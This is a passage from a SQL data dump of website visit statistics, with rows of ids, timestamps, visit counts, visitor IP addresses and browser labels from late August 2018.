2','other'),(296561,1535571062,1,1,0,0,'54.36.149.10','other'),(296562,1535571177,1,1,0,0,'54.36.148.152','other'),(296563,1535571464,2,2,0,0,'216.244.66.241','other'),(296564,1535571619,1,1,0,0,'54.36.149.90','other'),(296565,1535571689,1,1,0,0,'54.36.148.68','other'),(296566,1535571893,1,1,0,0,'95.163.255.174','other'),(296567,1535571969,1,1,0,0,'54.36.148.169','other'),(296568,1535572097,1,1,0,0,'54.36.148.162','other'),(296569,1535572142,1,1,0,0,'54.36.149.16','other'),(296570,1535572265,1,1,0,0,'54.36.149.95','other'),(296571,1535572278,1,0,1,0,'66.249.66.157',''),(296572,1535572303,1,0,1,0,'66.249.66.156',''),(296573,1535572422,1,1,0,0,'54.36.149.102','other'),(296574,1535572503,2,2,0,0,'141.8.142.74','other'),(296575,1535572511,1,1,0,0,'178.154.171.88','other'),(296576,1535572901,1,1,0,0,'54.36.148.110','other'),(296577,1535573029,1,1,0,0,'54.36.148.193','other'),(296578,1535573074,1,1,0,0,'54.36.148.169','other'),(296579,1535573390,1,1,0,0,'157.55.39.16','other'),(296580,1535573610,1,0,1,0,'66.249.66.57',''),(296581,1535573732,1,1,0,0,'141.8.142.74','other'),(296582,1535574036,1,1,0,0,'216.244.66.241','other'),(296583,1535574129,1,0,1,0,'66.249.66.155',''),(296584,1535574183,1,1,0,0,'54.36.148.195','other'),(296585,1535574317,1,1,0,0,'54.36.149.95','other'),(296586,1535574492,1,1,0,0,'54.36.149.34','other'),(296587,1535574622,1,1,0,0,'91.196.178.100','chrome'),(296588,1535574676,1,1,0,0,'54.36.148.117','other'),(296589,1535574892,1,1,0,0,'141.8.142.74','other'),(296590,1535575172,1,1,0,0,'54.36.149.41','other'),(296591,1535575468,2,0,2,0,'66.249.66.59',''),(296592,1535575502,1,1,0,0,'54.36.148.169','other'),(296593,1535575656,1,0,1,0,'66.249.66.61',''),(296594,1535575855,1,1,0,0,'54.36.148.230','other'),(296595,1535575968,1,1,0,0,'157.55.39.16','other'),(296596,1535576025,1,1,0,0,'194.40.242.24','chrome'),(296597,1535576610,1,1,0,0,'162.210.196.130','other'),(296598,1535576655,3,3,0,0,'216.244.66.241','other'),(296599,1535576717,1,1,0,0,'54.36.148.66','other'),(296600,1535577206,1,1,0,0,'54.36.149.6','other'),(296601,1535577906,1,1,0,0,'54.36.148.125','other'),(296602,1535577999,1,1,0,0,'54.36.148.117','other'),(296603,1535578180,1,1,0,0,'54.36.148.138','other'),(296604,1535578325,1,1,0,0,'54.36.148.176','other'),(296605,1535578410,1,1,0,0,'54.36.148.252','other'),(296606,1535578479,1,1,0,0,'54.36.148.20','other'),(296607,1535578529,1,1,0,0,'8.29.198.27','other'),(296608,1535578890,3,3,0,0,'216.244.66.241','other'),(296609,1535578891,1,1,0,0,'54.36.148.151','other'),(296610,1535578981,1,1,0,0,'54.36.149.70','other'),(296611,1535579107,1,1,0,0,'54.36.148.189','other'),(296612,1535579347,1,0,1,0,'66.249.66.57',''),(296613,1535579924,1,1,0,0,'40.77.167.47','other'),(296614,1535580392,1,1,0,0,'54.36.148.208','other'),(296615,1535580679,1,0,1,0,'66.249.66.155',''),(296616,1535581499,1,1,0,0,'54.36.148.13','other'),(296617,1535581762,1,1,0,0,'54.36.148.65','other'),(296618,1535581947,1,1,0,0,'54.36.148.164','other'),(296619,1535582245,1,1,0,0,'54.36.148.64','other'),(296620,1535582441,1,1,0,0,'54.36.148.126','other'),(296621,1535582711,1,1,0,0,'54.36.149.17','other'),(296622,1535582813,1,1,0,0,'54.36.149.47','other'),(296623,1535582823,1,0,1,0,'66.249.66.59',''),(296624,1535582950,1,1,0,0,'5.188.210.44','chrome'),(296625,1535583297,1,1,0,0,'54.36.148.92','other'),(296626,1535583496,1,1,0,0,'54.36.148.93','other'),(296627,1535583540,1,1,0,0,'54.36.148.84','other'),(296628,1535583842,1,1,0,0,'54.36.149.47','other'),(296629,1535583961,1,1,0,0,'216.244.66.241','other'),(296630,1535584594,1,1,0,0,'95.163.255.150','other'),(296631,1535584652,1,1,0,0,'54.36.148.149','other'),(296632,1535584959,1,1,0,0,'54.36.149.58','other'),(296633,1535585058,2,2,0,0,'5.9.97.200','other'),(296634,1535585153,1,1,0,0,'54.36.149.14','other'),(296635,1535585156,1,1,0,0,'54.36.148.107','other'),(296636,1535585349,1,1,0,0,'141.8.142.74','other'),(296637,1535585534,1,1,0,0,'54.36.149.86','other'),(296638,1535585987,1,1,0,0,'54.36.148.152','other'),(296639,1535586081,1,1,0,0,'54.36.148.154','other'),(296640,1535586392,1,1,0,0,'54.36.148.143','other'),(296641,1535586420,1,1,0,0,'54.36.149.77','other'),(296642,1535586429,1,1,0,0,'178.154.171.88','other'),(296643,1535586433,1,1,0,0,'141.8.142.74','other'),(296644,1535586494,1,1,0,0,'216.244.66.241','other'),(296645,1535586764,1,0,1,0,'66.249.66.157',''),(296646,1535587102,1,1,0,0,'66.249.66.57','chrome'),(296647,1535587237,1,1,0,0,'54.36.149.70','other'),(296648,1535587535,1,1,0,0,'54.36.149.53','other'),(296649,1535587548,1,1,0,0,'54.36.148.123','other'),(296650,1535587574,1,1,0,0,'54.36.149.7','other'),(296651,1535588283,1,1,0,0,'54.36.149.56','other'),(296652,1535588692,1,1,0,0,'37.9.113.182','other'),(296653,1535588693,1,1,0,0,'54.36.149.31','other'),(296654,1535588722,1,1,0,0,'54.36.149.100','other'),(296655,1535589055,1,1,0,0,'54.36.149.91','other'),(296656,1535589408,1,1,0,0,'8.29.198.26','other'),(296657,1535589865,1,0,1,0,'66.249.66.157',''),(296658,1535590029,1,1,0,0,'66.249.66.59','chrome'),(296659,1535590242,1,0,1,0,'66.249.66.57',''),(296660,1535590470,1,1,0,0,'141.8.142.74','other'),(296661,1535590598,1,1,0,0,'54.165.59.7','other'),(296662,1535590692,1,1,0,0,'54.36.148.34','other'),(296663,1535590744,1,1,0,0,'54.36.148.16','other'),(296664,1535591240,1,1,0,0,'54.36.148.25','other'),(296665,1535591601,2,2,0,0,'54.36.148.204','other'),(296666,1535591707,2,2,0,0,'54.165.59.7','other'),(296667,1535591746,1,1,0,0,'54.36.149.29','other'),(296668,1535591888,1,1,0,0,'54.36.149.33','other'),(296669,1535592025,1,1,0,0,'54.36.148.92','other'),(296670,1535592261,1,1,0,0,'87.250.224.46','other'),(296671,1535592492,1,1,0,0,'54.36.148.141','other'),(296672,1535592529,1,1,0,0,'207.46.13.183','other'),(296673,1535593062,1,1,0,0,'54.36.149.56','other'),(296674,1535593067,2,2,0,0,'54.165.59.7','other'),(296675,1535593073,1,1,0,0,'54.36.148.105','other'),(296676,1535593102,1,1,0,0,'66.249.66.156','chrome'),(296677,1535593300,1,1,0,0,'54.36.148.47','other'),(296678,1535593554,1,1,0,0,'54.36.148.195','other'),(296679,1535593661,1,1,0,0,'54.36.148.61','other'),(296680,1535593825,1,1,0,0,'54.36.148.229','other'),(296681,1535593879,1,1,0,0,'54.36.149.2','other'),(296682,1535593966,1,1,0,0,'54.36.148.119','other'),(296683,1535594010,2,2,0,0,'216.244.66.241','other'),(296684,1535594074,1,1,0,0,'54.36.148.199','other'),(296685,1535594165,1,1,0,0,'54.36.148.93','other'),(296686,1535594497,8,8,0,0,'144.76.91.79','other'),(296687,1535594955,1,1,0,0,'178.154.171.88','other'),(296688,1535595089,1,1,0,0,'54.36.148.209','other'),(296689,1535595312,1,0,1,0,'66.249.66.155',''),(296690,1535595463,1,1,0,0,'66.249.66.59','chrome'),(296691,1535595675,1,1,0,0,'54.36.148.215','other'),(296692,1535595862,1,1,0,0,'54.36.149.46','other'),(296693,1535595967,1,1,0,0,'54.165.59.7','other'),(296694,1535596013,1,1,0,0,'54.36.149.82','other'),(296695,1535596355,1,1,0,0,'54.36.149.97','other'),(296696,1535596552,1,1,0,0,'54.36.149.65','other'),(296697,1535596602,1,1,0,0,'54.36.149.62','other'),(296698,1535596719,1,1,0,0,'54.36.148.27','other'),(296699,1535596880,1,1,0,0,'54.36.148.35','other'),(296700,1535596987,1,0,1,0,'66.249.66.156',''),(296701,1535597446,1,1,0,0,'216.244.66.241','other'),(296702,1535597528,1,1,0,0,'54.165.59.7','other'),(296703,1535597697,1,1,0,0,'54.36.149.80','other'),(296704,1535597786,1,1,0,0,'54.36.148.168','other'),(296705,1535597793,1,1,0,0,'54.36.149.67','other'),(296706,1535597806,1,1,0,0,'54.36.148.240','other'),(296707,1535597956,1,1,0,0,'54.36.149.22','other'),(296708,1535598007,1,1,0,0,'54.36.148.110','other'),(296709,1535598176,1,1,0,0,'54.36.148.222','other'),(296710,1535598267,1,1,0,0,'54.36.149.93','other'),(296711,1535598318,1,1,0,0,'54.36.148.112','other'),(296712,1535599338,1,1,0,0,'54.36.149.24','other'),(296713,1535599353,1,1,0,0,'54.36.148.200','other'),(296714,1535599654,1,1,0,0,'54.36.149.80','other'),(296715,1535600142,1,1,0,0,'54.36.148.150','other'),(296716,1535600185,1,1,0,0,'54.36.149.78','other'),(296717,1535600199,1,1,0,0,'54.36.148.249','other'),(296718,1535600266,1,1,0,0,'8.29.198.25','other'),(296719,1535600560,1,1,0,0,'54.36.148.97','other'),(296720,1535600618,1,1,0,0,'54.36.149.50','other'),(296721,1535600898,1,1,0,0,'54.36.148.48','other'),(296722,1535600991,1,1,0,0,'54.36.148.188','other'),(296723,1535601314,1,1,0,0,'54.36.149.89','other'),(296724,1535601511,1,1,0,0,'54.36.149.48','other'),(296725,1535602102,1,1,0,0,'216.244.66.241','other'),(296726,1535602290,1,1,0,0,'54.36.148.205','other'),(296727,1535602622,1,1,0,0,'54.165.59.7','other'),(296728,1535602783,1,1,0,0,'54.36.148.217','other'),(296729,1535603543,1,1,0,0,'54.36.148.122','other'),(296730,1535603645,1,1,0,0,'54.36.148.15','other'),(296731,1535604129,1,1,0,0,'54.36.148.55','other'),(296732,1535604302,1,0,1,0,'66.249.66.155',''),(296733,1535604388,1,1,0,0,'66.249.66.59','chrome'),(296734,1535604494,1,1,0,0,'54.36.148.165','other'),(296735,1535604622,3,3,0,0,'216.244.66.241','other'),(296736,1535604804,1,1,0,0,'141.8.142.74','other'),(296737,1535604847,1,1,0,0,'54.36.149.2','other'),(296738,1535605409,1,1,0,0,'54.36.148.159','other'),(296739,1535605691,1,1,0,0,'54.36.148.88','other'),(296740,1535605862,1,1,0,0,'54.36.148.134','other'),(296741,1535606040,1,1,0,0,'51.255.65.46','other'),(296742,1535606091,1,1,0,0,'54.36.148.247','other'),(296743,1535606172,1,1,0,0,'178.154.171.88','other'),(296744,1535606466,1,1,0,0,'54.165.59.7','other'),(296745,1535606753,1,1,0,0,'95.163.255.191','other'),(296746,1535606989,1,1,0,0,'54.36.149.76','other'),(296747,1535607218,2,2,0,0,'216.244.66.241','other'),(296748,1535607525,1,1,0,0,'54.36.148.233','other'),(296749,1535608352,1,1,0,0,'37.54.26.159','chrome'),(296750,1535609089,1,1,0,0,'193.19.119.114','firefox'),(296751,1535609092,1,1,0,0,'216.244.66.241','other'),(296752,1535609447,1,1,0,0,'93.78.212.202','firefox'),(296753,1535609473,1,1,0,0,'95.163.255.157','other'),(296754,1535609494,1,1,0,0,'87.250.224.46','other'),(296755,1535610207,1,1,0,0,'178.154.171.88','other'),(296756,1535610266,1,1,0,0,'141.8.142.74','other'),(296757,1535610270,1,1,0,0,'37.9.113.182','other'),(296758,1535610601,1,1,0,0,'5.188.210.44','chrome'),(296759,1535611126,1,1,0,0,'8.29.198.26','other'),(296760,1535611453,1,0,1,0,'66.249.66.155',''),(296761,1535611561,1,1,0,0,'66.249.66.57','chrome'),(296762,1535612026,3,3,0,0,'141.8.142.74','other'),(296763,1535613450,1,1,0,0,'78.111.190.54','chrome'),(296764,1535613545,1,1,0,0,'141.8.142.74','other'),(296765,1535613649,1,1,0,0,'123.1.189.41','chrome'),(296766,1535613703,1,1,0,0,'180.163.220.125','chrome'),(296767,1535614237,1,1,0,0,'185.191.204.9','chrome'),(296768,1535614928,1,1,0,0,'178.154.171.88','other'),(296769,1535615119,1,1,0,0,'66.249.66.157','chrome'),(296770,1535615610,1,1,0,0,'141.8.142.74','other'),(296771,1535616684,1,0,1,0,'66.249.66.156',''),(296772,1535616720,1,1,0,0,'91.196.178.169','chrome'),(296773,1535616893,1,1,0,0,'141.8.142.74','other'),(296774,1535616927,1,1,0,0,'54.165.59.7','other'),(296775,1535617251,1,1,0,0,'178.95.67.148','chrome'),(296776,1535617286,1,1,0,0,'95.163.255.182','other'),(296777,1535617938,1,1,0,0,'157.55.39.227','other'),(296778,1535618163,2,2,0,0,'216.244.66.241','other'),(296779,1535618441,1,0,1,0,'66.249.66.59',''),(296780,1535618540,1,0,1,0,'66.249.66.156',''),(296781,1535618618,1,1,0,0,'178.92.222.234','chrome'),(296782,1535618630,1,1,0,0,'66.249.66.57','chrome'),(296783,1535618696,1,1,0,0,'141.8.142.167','other'),(296784,1535619124,1,1,0,0,'91.196.177.46','chrome'),(296785,1535619653,3,3,0,0,'141.8.142.74','other'),(296786,1535619700,1,0,1,0,'66.249.66.156',''),(296787,1535619869,1,1,0,0,'178.154.171.88','other'),(296788,1535620283,1,0,1,0,'66.249.66.157',''),(296789,1535620416,1,1,0,0,'157.55.39.16','other'),(296790,1535620928,1,1,0,0,'37.9.113.182','other'),(296791,1535620931,2,2,0,0,'141.8.142.74','other'),(296792,1535621483,2,2,0,0,'162.210.196.98','other'),(296793,1535621990,1,1,0,0,'8.29.198.26','other'),(296794,1535622569,1,1,0,0,'141.8.142.74','other'),(296795,1535622727,1,1,0,0,'178.154.171.88','other'),(296796,1535623679,1,1,0,0,'178.154.171.88','other'),(296797,1535624159,1,1,0,0,'91.196.178.129','firefox'),(296798,1535624487,2,2,0,0,'141.8.142.74','other'),(296799,1535624669,4,4,0,0,'178.154.171.88','other'),(296800,1535624815,1,1,0,0,'66.249.66.59','chrome'),(296801,1535625864,1,0,1,0,'66.249.66.156',''),(296802,1535625951,1,1,0,0,'66.249.66.57','chrome'),(296803,1535626719,1,1,0,0,'141.8.142.74','other'),(296804,1535627218,3,3,0,0,'178.154.171.88','other'),(296805,1535627887,1,1,0,0,'95.163.255.188','other'),(296806,1535628024,1,1,0,0,'91.124.238.85','chrome'),(296807,1535628131,1,1,0,0,'141.8.142.74','other'),(296808,1535628649,1,1,0,0,'216.244.66.241','other'),(296809,1535628747,1,1,0,0,'130.180.216.121','chrome'),(296810,1535629613,2,2,0,0,'141.8.142.74','other'),(296811,1535629818,1,1,0,0,'91.124.182.170','firefox'),(296812,1535630418,1,1,0,0,'95.132.24.160','firefox'),(296813,1535630821,2,2,0,0,'178.154.171.88','other'),(296814,1535630859,3,3,0,0,'141.8.142.74','other'),(296815,1535631171,1,1,0,0,'87.250.224.46','other'),(296816,1535631561,2,2,0,0,'216.244.66.241','other'),(296817,1535631776,2,2,0,0,'91.196.177.46','chrome'),(296818,1535631883,1,1,0,0,'157.55.39.16','other'),(296819,1535632002,1,1,0,0,'176.120.111.156','chrome'),(296820,1535632682,2,2,0,0,'87.250.224.46','other'),(296821,1535632780,1,1,0,0,'40.77.167.47','other'),(296822,1535632863,1,1,0,0,'91.196.177.46','chrome'),(296823,1535632876,1,1,0,0,'8.29.198.27','other'),(296824,1535632935,2,0,2,0,'66.249.66.156',''),(296825,1535632947,1,0,1,0,'66.249.66.57',''),(296826,1535633074,1,1,0,0,'66.249.66.57','chrome'),(296827,1535633299,2,2,0,0,'141.8.142.74','other'),(296828,1535633422,1,1,0,0,'91.209.11.236','other'),(296829,1535633780,2,2,0,0,'178.154.171.88','other'),(296830,1535634307,1,1,0,0,'40.77.167.134','other'),(296831,1535634723,1,1,0,0,'91.196.178.34','chrome'),(296832,1535635605,2,2,0,0,'91.196.178.69','chrome'),(296833,1535635710,1,1,0,0,'91.196.178.88','chrome'),(296834,1535635800,1,1,0,0,'91.196.178.136','firefox'),(296835,1535636105,1,1,0,0,'87.250.224.46','other'),(296836,1535636325,1,1,0,0,'141.8.142.74','other'),(296837,1535636847,1,1,0,0,'216.244.66.241','other'),(296838,1535638235,1,1,0,0,'178.154.171.88','other'),(296839,1535638405,1,1,0,0,'91.196.178.69','chrome'),(296840,1535638561,1,1,0,0,'141.8.142.74','other'),(296841,1535638809,1,1,0,0,'37.110.129.86','chrome'),(296842,1535639325,1,1,0,0,'178.154.171.88','other'),(296843,1535639656,1,1,0,0,'95.163.255.186','other'),(296844,1535639869,2,2,0,0,'141.8.142.74','other'),(296845,1535641276,1,1,0,0,'178.154.171.88','other'),(296846,1535642114,1,1,0,0,'216.244.66.241','other'),(296847,1535642125,1,0,1,0,'66.249.66.156',''),(296848,1535642294,2,2,0,0,'178.154.171.88','other'),(296849,1535642933,1,1,0,0,'188.230.43.254','other'),(296850,1535643420,3,3,0,0,'178.154.171.88','other'),(296851,1535643447,1,1,0,0,'37.52.22.139','chrome'),(296852,1535643876,1,0,1,0,'66.249.66.57',''),(296853,1535643880,1,1,0,0,'8.29.198.26','other'),(296854,1535643894,1,1,0,0,'66.249.66.57','chrome'),(296855,1535644153,1,0,1,0,'66.249.66.155',''),(296856,1535645159,1,1,0,0,'141.8.142.74','other'),(296857,1535645243,1,1,0,0,'178.154.171.88','other'),(296858,1535645246,1,1,0,0,'37.9.113.182','other'),(296859,1535645332,1,1,0,0,'188.230.43.254','other'),(296860,1535645357,1,1,0,0,'95.163.255.114','other'),(296861,1535645364,2,2,0,0,'95.163.255.115','other'),(296862,1535645371,1,1,0,0,'95.163.255.113','other'),(296863,1535645615,1,1,0,0,'185.58.206.80','firefox'),(296864,1535646015,1,1,0,0,'178.154.200.41','other'),(296865,1535646619,3,3,0,0,'87.250.224.46','other'),(296866,1535646677,1,1,0,0,'141.8.142.74','other'),(296867,1535646951,1,1,0,0,'91.196.178.87','firefox'),(296868,1535647233,1,1,0,0,'91.196.177.69','firefox'),(296869,1535647698,1,1,0,0,'87.250.224.46','other'),(296870,1535647728,1,1,0,0,'188.230.43.254','other'),(296871,1535648058,1,1,0,0,'185.191.204.9','chrome'),(296872,1535649236,1,1,0,0,'31.184.238.34','chrome'),(296873,1535649286,1,1,0,0,'109.86.71.21','firefox'),(296874,1535649475,1,1,0,0,'141.8.142.74','other'),(296875,1535649561,5,5,0,0,'178.154.171.88','other'),(296876,1535649767,1,0,1,0,'66.249.66.156',''),(296877,1535650100,1,1,0,0,'95.163.255.180','other'),(296878,1535650568,1,1,0,0,'178.154.171.88','other'),(296879,1535650573,1,1,0,0,'46.211.138.196','chrome'),(296880,1535650665,2,2,0,0,'87.250.224.46','other'),(296881,1535650697,1,1,0,0,'141.8.142.74','other'),(296882,1535651623,1,1,0,0,'95.163.255.182','other'),(296883,1535651700,4,4,0,0,'141.8.142.74','other'),(296884,1535651800,1,1,0,0,'91.196.178.41','chrome'),(296885,1535652171,3,3,0,0,'178.154.171.88','other'),(296886,1535652227,1,0,1,0,'66.249.66.155',''),(296887,1535652669,1,1,0,0,'37.9.113.182','other'),(296888,1535653014,1,1,0,0,'209.90.225.195','chrome'),(296889,1535653252,3,3,0,0,'178.240.11.9','other'),(296890,1535653552,1,1,0,0,'157.55.39.16','other'),(296891,1535653593,1,1,0,0,'40.77.167.47','other'),(296892,1535654163,1,1,0,0,'66.249.66.61','chrome'),(296893,1535654170,1,1,0,0,'52.41.211.72','chrome'),(296894,1535654219,1,0,1,0,'66.249.66.57',''),(296895,1535654382,1,0,1,0,'66.249.66.155',''),(296896,1535654589,1,1,0,0,'92.113.189.235','chrome'),(296897,1535654614,2,2,0,0,'141.8.142.74','other'),(296898,1535654792,1,1,0,0,'8.29.198.25','other'),(296899,1535654796,1,1,0,0,'157.55.39.16','other'),(296900,1535655544,2,2,0,0,'91.196.178.47','chrome'),(296901,1535656313,2,2,0,0,'178.154.171.88','other'),(296902,1535656677,1,1,0,0,'141.8.142.74','other'),(296903,1535657762,1,1,0,0,'178.154.171.88','other'),(296904,1535657960,1,1,0,0,'40.77.167.47','other'),(296905,1535658027,1,0,1,0,'66.249.66.156',''),(296906,1535658029,1,1,0,0,'95.163.255.184','other'),(296907,1535658706,3,3,0,0,'178.154.171.88','other'),(296908,1535658787,3,3,0,0,'87.250.224.46','other'),(296909,1535658836,3,3,0,0,'141.8.142.74','other'),(296910,1535659195,1,1,0,0,'185.191.204.9','chrome'),(296911,1535659346,1,0,1,0,'66.249.66.155',''),(296912,1535660062,1,0,1,0,'66.249.66.157',''),(296913,1535660215,2,2,0,0,'141.8.142.74','other'),(296914,1535660416,2,2,0,0,'37.9.113.182','other'),(296915,1535660595,1,1,0,0,'66.249.66.57','chrome'),(296916,1535660981,1,1,0,0,'144.76.71.176','other'),(296917,1535661196,3,3,0,0,'141.8.142.74','other'),(296918,1535661210,1,1,0,0,'95.163.255.192','other'),(296919,1535661399,1,1,0,0,'178.154.171.88','other'),(296920,1535661622,1,1,0,0,'157.55.39.16','other'),(296921,1535661706,1,1,0,0,'95.27.46.198','msie'),(296922,1535662440,1,1,0,0,'87.250.224.46','other'),(296923,1535662753,2,1,1,0,'66.249.66.155',''),(296924,1535662824,2,1,1,0,'66.249.66.157',''),(296925,1535663818,1,1,0,0,'52.53.201.78','chrome'),(296926,1535664225,1,1,0,0,'141.8.142.74','other'),(296927,1535664681,1,1,0,0,'37.9.113.101','other'),(296928,1535665316,1,1,0,0,'178.154.171.88','other'),(296929,1535665414,1,1,0,0,'87.250.224.46','other'),(296930,1535665534,1,1,0,0,'66.249.66.57','chrome'),(296931,1535665678,1,1,0,0,'8.29.198.27','other'),(296932,1535666159,1,1,0,0,'141.8.142.74','other'),(296933,1535666977,1,0,1,0,'66.249.66.57',''),(296934,1535666986,1,1,0,0,'37.9.113.182','other'),(296935,1535667111,1,1,0,0,'37.9.113.115','other'),(296936,1535667669,1,1,0,0,'141.8.142.74','other'),(296937,1535667779,1,1,0,0,'66.249.66.155','chrome'),(296938,1535668407,1,1,0,0,'37.9.113.110','other'),(296939,1535668422,1,1,0,0,'178.154.171.60','other'),(296940,1535668436,1,1,0,0,'178.154.171.88','other'),(296941,1535668925,1,1,0,0,'95.163.255.196','other'),(296942,1535668934,1,0,1,0,'66.249.66.156',''),(296943,1535670100,1,0,1,0,'66.249.66.157',''),(296944,1535670315,1,1,0,0,'40.77.167.134','other'),(296945,1535670676,1,1,0,0,'66.249.66.57','chrome'),(296946,1535671329,1,0,1,0,'66.249.66.157',''),(296947,1535671476,1,1,0,0,'141.8.142.74','other'),(296948,1535671479,1,1,0,0,'87.250.224.46','other'),(296949,1535671482,2,2,0,0,'178.154.171.88','other'),(296950,1535672006,1,1,0,0,'95.163.255.188','other'),(296951,1535672215,1,1,0,0,'40.77.167.134','other'),(296952,1535673169,1,1,0,0,'216.244.66.241','other'),(296953,1535674375,1,1,0,0,'37.9.113.100','other'),(296954,1535674983,1,1,0,0,'95.163.255.181','other'),(296955,1535675829,1,1,0,0,'66.249.66.57','chrome'),(296956,1535675988,1,1,0,0,'178.154.171.88','other'),(296957,1535675991,1,1,0,0,'87.250.224.46','other'),(296958,1535676217,1,1,0,0,'216.244.66.241','other'),(296959,1535676565,1,1,0,0,'8.29.198.26','other'),(296960,1535676814,1,1,0,0,'141.8.142.74','other'),(296961,1535676946,1,1,0,0,'178.154.171.88','other'),(296962,1535677483,1,0,1,0,'66.249.66.59',''),(296963,1535677701,1,1,0,0,'40.77.167.47','other'),(296964,1535677897,1,1,0,0,'37.9.113.182','other'),(296965,1535677962,2,2,0,0,'178.154.171.88','other'),(296966,1535678203,1,1,0,0,'217.69.143.53','other'),(296967,1535679117,1,1,0,0,'178.154.171.88','other'),(296968,1535679121,1,1,0,0,'141.8.142.74','other'),(296969,1535680622,1,0,1,0,'66.249.66.155',''),(296970,1535680682,1,0,1,0,'66.249.66.157',''),(296971,1535681164,1,1,0,0,'66.249.66.61','chrome'),(296972,1535682597,1,1,0,0,'87.250.224.46','other'),(296973,1535682791,1,1,0,0,'37.204.75.202','msie'),(296974,1535682883,1,1,0,0,'141.8.142.74','other'),(296975,1535682896,1,1,0,0,'37.9.113.182','other'),(296976,1535683193,2,2,0,0,'216.244.66.241','other'),(296977,1535683582,1,1,0,0,'95.163.255.168','other'),(296978,1535683903,3,3,0,0,'178.154.171.88','other'),(296979,1535685011,1,1,0,0,'178.154.171.88','other'),(296980,1535685431,1,0,1,0,'66.249.66.59',''),(296981,1535685557,2,2,0,0,'216.244.66.241','other'),(296982,1535686451,1,1,0,0,'178.154.171.88','other'),(296983,1535686581,1,1,0,0,'216.244.66.241','other'),(296984,1535686765,1,1,0,0,'37.9.113.182','other'),(296985,1535686939,1,1,0,0,'37.9.113.115','other'),(296986,1535686976,2,2,0,0,'141.8.142.74','other'),(296987,1535687431,1,1,0,0,'8.29.198.26','other'),(296988,1535687502,1,1,0,0,'66.249.66.61','chrome'),(296989,1535687530,1,1,0,0,'178.154.171.88','other'),(296990,1535687546,1,1,0,0,'87.250.224.46','other'),(296991,1535688759,1,1,0,0,'178.154.171.4','other'),(296992,1535688966,3,3,0,0,'141.8.142.74','other'),(296993,1535689487,1,0,1,0,'66.249.66.155',''),(296994,1535690478,4,4,0,0,'178.154.171.88','other'),(296995,1535690577,2,2,0,0,'37.9.113.182','other'),(296996,1535690822,1,0,1,0,'66.249.66.156',''),(296997,1535690914,1,1,0,0,'141.8.142.74','other'),(296998,1535691176,14,14,0,0,'5.9.71.213','other'),(296999,1535692241,1,1,0,0,'141.8.142.167','other'),(297000,1535692243,1,1,0,0,'37.9.113.134','other'),(297001,1535692532,1,1,0,0,'141.8.142.74','other'),(297002,1535693339,1,1,0,0,'37.9.113.115','other'),(297003,1535693529,1,1,0,0,'216.244.66.241','other'),(297004,1535694020,1,0,1,0,'66.249.66.157',''),(297005,1535694255,1,1,0,0,'66.249.66.57','chrome'),(297006,1535694568,1,1,0,0,'91.200.124.53','chrome'),(297007,1535694612,1,1,0,0,'91.196.178.77','chrome'),(297008,1535694786,1,1,0,0,'216.244.66.241','other'),(297009,1535694906,1,1,0,0,'141.8.142.74','other'),(297010,1535695349,1,0,1,0,'66.249.66.59',''),(297011,1535697005,2,2,0,0,'162.210.196.130','other'),(297012,1535697326,1,1,0,0,'216.244.66.241','other'),(297013,1535697498,2,2,0,0,'141.8.142.74','other'),(297014,1535697954,2,2,0,0,'91.196.178.184','chrome'),(297015,1535698301,1,1,0,0,'8.29.198.27','other'),(297016,1535698671,1,1,0,0,'178.154.171.88','other'),(297017,1535698785,1,1,0,0,'180.76.15.8','other'),(297018,1535698989,1,1,0,0,'91.196.177.46','chrome'),(297019,1535699058,1,0,1,0,'66.249.66.156',''),(297020,1535699389,1,1,0,0,'66.249.66.59','chrome'),(297021,1535699559,1,1,0,0,'178.154.200.41','other'),(297022,1535699923,1,1,0,0,'82.145.208.243','other'),(297023,1535700378,1,1,0,0,'178.154.171.88','other'),(297024,1535700403,1,1,0,0,'95.163.255.160','other'),(297025,1535701736,1,1,0,0,'95.163.255.168','other'),(297026,1535702029,1,0,1,0,'66.249.66.155',''),(297027,1535702559,1,1,0,0,'141.8.142.152','other'),(297028,1535702721,2,2,0,0,'141.8.142.74','other'),(297029,1535703003,1,1,0,0,'95.163.255.177','other'),(297030,1535703097,1,1,0,0,'141.8.132.19','other'),(297031,1535703152,1,1,0,0,'37.53.111.46','firefox'),(297032,1535703197,1,1,0,0,'91.196.178.174','chrome'),(297033,1535704067,1,1,0,0,'91.196.178.88','chrome'),(297034,1535704166,2,2,0,0,'87.250.224.46','other'),(297035,1535704396,2,2,0,0,'141.8.142.74','other'),(297036,1535704552,1,0,1,0,'66.249.66.155',''),(297037,1535704845,1,0,1,0,'66.249.66.61',''),(297038,1535705060,1,1,0,0,'216.244.66.241','other'),(297039,1535705183,1,1,0,0,'66.249.66.59','chrome'),(297040,1535705247,1,1,0,0,'178.95.67.148','chrome'),(297041,1535705321,2,2,0,0,'91.196.177.46','chrome'),(297042,1535706016,9,9,0,0,'69.30.198.186','other'),(297043,1535706298,1,0,1,0,'66.249.66.157',''),(297044,1535706646,1,1,0,0,'178.154.200.41','other'),(297045,1535706655,1,1,0,0,'213.180.203.8','other'),(297046,1535706747,2,2,0,0,'141.8.142.74','other'),(297047,1535706751,1,1,0,0,'178.154.171.88','other'),(297048,1535707464,1,1,0,0,'213.108.43.94','chrome'),(297049,1535707689,1,1,0,0,'141.8.142.74','other'),(297050,1535707767,1,1,0,0,'216.244.66.241','other'),(297051,1535709003,1,1,0,0,'95.135.14.93','chrome'),(297052,1535709162,1,1,0,0,'8.29.198.25','other'),(297053,1535709568,1,1,0,0,'87.250.224.46','other'),(297054,1535710160,1,1,0,0,'207.46.13.36','other'),(297055,1535711006,1,1,0,0,'77.93.41.218','chrome'),(297056,1535711755,1,0,1,0,'66.249.66.156',''),(297057,1535711941,1,1,0,0,'66.249.66.61','chrome'),(297058,1535712888,1,1,0,0,'163.172.4.153','chrome'),(297059,1535713712,2,2,0,0,'178.154.171.88','other'),(297060,1535714303,1,1,0,0,'91.196.178.136','firefox'),(297061,1535714371,1,1,0,0,'95.135.238.145','chrome'),(297062,1535714713,1,1,0,0,'46.211.37.92','other'),(297063,1535714798,1,1,0,0,'78.154.163.68','opera'),(297064,1535714981,8,8,0,0,'157.55.39.34','other'),(297065,1535714992,4,4,0,0,'207.46.13.247','other'),(297066,1535715426,1,1,0,0,'216.244.66.241','other'),(297067,1535715651,1,0,1,0,'66.249.66.61',''),(297068,1535715900,2,2,0,0,'141.8.142.74','other'),(297069,1535715968,1,1,0,0,'178.154.171.88','other'),(297070,1535716311,1,1,0,0,'46.201.112.120','chrome'),(297071,1535716845,1,1,0,0,'93.74.232.137','firefox'),(297072,1535717128,2,2,0,0,'216.244.66.241','other'),(297073,1535717151,2,2,0,0,'91.196.177.46','chrom